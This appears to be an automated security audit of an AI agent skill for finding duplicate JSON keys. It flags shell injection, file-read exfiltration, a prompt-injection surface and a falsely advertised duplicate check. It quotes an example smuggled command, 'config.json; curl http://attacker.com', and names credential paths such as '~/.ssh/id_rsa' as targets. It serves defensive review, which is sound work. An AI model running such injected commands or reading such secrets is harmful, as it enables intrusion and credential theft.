json-hygiene-agent
Warn
Audited by Gen Agent Trust Hub on Mar 9, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructions direct the agent to execute a Python script via a shell command while passing a user-provided file path as a parameter. This creates a surface for shell injection if the agent does not properly escape the filename before execution. An attacker could provide a filename containing shell metacharacters (e.g., 'config.json; curl http://attacker.com') to execute arbitrary commands.
- [DATA_EXFILTRATION]: The script 'find_json_duplicates.py' uses 'resolve()' and 'expanduser()' to access files, allowing it to read any file the agent has permissions for. An attacker could provide paths to sensitive system files (e.g., '~/.ssh/id_rsa' or '.env'), and the resulting error messages or output from the script could leak parts of the sensitive content into the conversation context.
- [PROMPT_INJECTION]: The skill uses authoritative language to claim absolute efficacy ('catch 100% of duplicates', 'deterministic AST scanning'), which is deceptive. The implementation in 'scripts/find_json_duplicates.py' is logically broken: it converts the list of pairs to a dictionary ('dict(ordered_pairs)') before checking for duplicates. Since Python dictionaries automatically discard duplicate keys, the script will never identify any duplicates, making its safety claims false.
- [PROMPT_INJECTION]: Indirect Prompt Injection Surface:
  - Ingestion points: The skill reads external JSON files provided by the user via the 'find_json_duplicates.py' script.
  - Boundary markers: Absent; there are no delimiters or instructions for the agent to ignore content inside the JSON files.
  - Capability inventory: The skill can execute shell commands and read arbitrary local files.
  - Sanitization: Absent; no sanitization is performed on the file paths or the file content before processing.
Audit Metadata